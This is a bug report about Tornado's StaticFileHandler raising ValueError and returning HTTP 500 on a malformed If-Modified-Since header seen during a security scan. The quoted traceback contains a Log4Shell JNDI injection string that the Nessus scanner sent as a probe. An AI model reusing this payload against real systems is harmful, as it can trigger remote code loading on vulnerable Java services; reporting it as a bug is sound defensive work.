ValueError when If-Modified-Since is invalid for StaticFileHandler request

[rgajrawala]

Hello, recently our application underwent a security scan and I noticed our Tornado app was returning HTTP 500 for some requests:

HTTPServerRequest(protocol='http', host='ip-x-x-x-x.ec2.internal', method='GET', uri='/', version='HTTP/1.1', remote_ip='x.x.x.x')
Traceback (most recent call last):
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 1790, in _execute
    result = await result
             ^^^^^^^^^^^^
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 2695, in get
    if self.should_return_304():
       ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/service/.local/lib/python3.11/site-packages/tornado/web.py", line 2820, in should_return_304
    if_since = email.utils.parsedate_to_datetime(ims_value)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/email/utils.py", line 200, in parsedate_to_datetime
    raise ValueError('Invalid date value or format "%s"' % str(data))
ValueError: Invalid date value or format "${jndi:ldap://log4shell-generic-xxx${lower:ten}.w.nessus.org/nessus}"
2024-06-26 11:46:16.900 500 GET / (x.x.x.x) 8.71ms

Looks like tornado.web.StaticFileHandler.should_return_304 is blindly parsing the If-Modified-Since header resulting in 500s. Ideally, invalid headers would return 400s.